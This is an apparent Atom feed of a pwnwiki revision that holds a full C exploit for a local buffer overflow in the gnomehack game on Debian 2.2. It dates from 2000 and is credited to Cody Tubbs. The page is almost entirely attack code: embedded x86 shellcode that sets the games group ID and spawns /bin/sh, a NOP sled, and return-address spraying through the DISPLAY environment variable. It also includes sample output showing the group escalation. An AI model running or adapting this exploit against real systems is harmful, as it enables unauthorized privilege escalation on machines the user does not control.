https://pwnwiki.com/index.php?action=history&feed=atom&title=GnomeHack_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
GnomeHack 本地緩衝區溢出漏洞 - Revision history
2026-04-09T04:18:59Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=GnomeHack_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=2081&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> /* * (gnomehack) local buffer overflow. (gid=games(60)) * * Author: Cody Tubbs (loophole of hhp). * www.hhp-programming.net / pigspigs@yahoo.com * 12/17/200..."
2021-05-03T13:23:52Z
<p>Created page with "==EXP== <pre> /* * (gnomehack) local buffer overflow. (gid=games(60)) * * Author: Cody Tubbs (loophole of hhp). * www.hhp-programming.net / pigspigs@yahoo.com * 12/17/200..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
/*<br />
* (gnomehack) local buffer overflow. (gid=games(60))<br />
*<br />
* Author: Cody Tubbs (loophole of hhp).<br />
* www.hhp-programming.net / pigspigs@yahoo.com<br />
* 12/17/2000<br />
*<br />
* Tested on Debian 2.2, kernel 2.2.17 - x86.<br />
* sgid "games"(60) by default.<br />
*<br />
* bash-2.03$ id<br />
* uid=1000(loophole) gid=501(noc)<br />
* bash-2.03$ ./h 0 0<br />
* Ret-addr 0x7fffe81c, offset: 0, allign: 0.<br />
* Can't resolve host name "????????????????"!<br />
* sh-2.03$ id<br />
* uid=1000(loophole) gid=501(noc) egid=60(games)<br />
* sh-2.03$<br />
*/<br />
<br />
#include <stdio.h><br />
<br />
#define OFFSET 0<br />
#define ALLIGN 0<br />
#define NOP 0x90<br />
#define DBUF 256 //120(RET*30)+((RET))+132(RET*33)<br />
#define GID 60<br />
<br />
static char shellcode[]=<br />
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"<br />
"\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"<br />
"\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"<br />
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"<br />
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"<br />
"\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";<br />
<br />
long get_sp(void){<br />
__asm__("movl %esp,%eax");<br />
}<br />
<br />
void workit(char *heh){<br />
fprintf(stderr, "\ngnomehack local exploit for Debian 2.2 - x86\n");<br />
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");<br />
fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", heh);<br />
fprintf(stderr, "Examp: %s 0\n", heh);<br />
fprintf(stderr, "Examp: %s 0 1\n", heh);<br />
exit(1);<br />
}<br />
<br />
main(int argc, char **argv){<br />
char eipeip[DBUF], buffer[4096], heh[DBUF+1];<br />
int i, offset, gid, allign;<br />
long address;<br />
<br />
if(argc < 2){<br />
workit(argv[0]);<br />
}<br />
<br />
if(argc > 1){<br />
offset = atoi(argv[1]);<br />
}else{<br />
offset = OFFSET;<br />
}<br />
<br />
if(argc > 2){<br />
allign = atoi(argv[2]);<br />
}else{<br />
allign = ALLIGN;<br />
}<br />
<br />
address = get_sp() - offset;<br />
<br />
if(allign > 0){<br />
for(i=0;i<allign;i++){<br />
eipeip[i] = 0x69; //0x69.DOOT:D<br />
}<br />
}<br />
<br />
for(i=allign;i<DBUF;i+=4){<br />
*(long *)&eipeip[i] = address;<br />
}<br />
<br />
gid = GID;<br />
shellcode[10] = gid;<br />
shellcode[22] = gid;<br />
shellcode[24] = gid;<br />
<br />
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){<br />
buffer[i] = NOP;<br />
}<br />
<br />
memcpy(heh, eipeip, strlen(eipeip));<br />
memcpy(heh, "DISPLAY=", 8);//HOME||DISPLAY<br />
putenv(heh);<br />
<br />
memcpy(buffer+i, shellcode, strlen(shellcode));<br />
memcpy(buffer, "HACKEX=", 7);<br />
putenv(buffer);<br />
<br />
fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address, offset, allign);<br />
execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed.<br />
}<br />
<br />
<br />
// milw0rm.com [2000-12-04]<br />
<br />
</pre></div>
Pwnwiki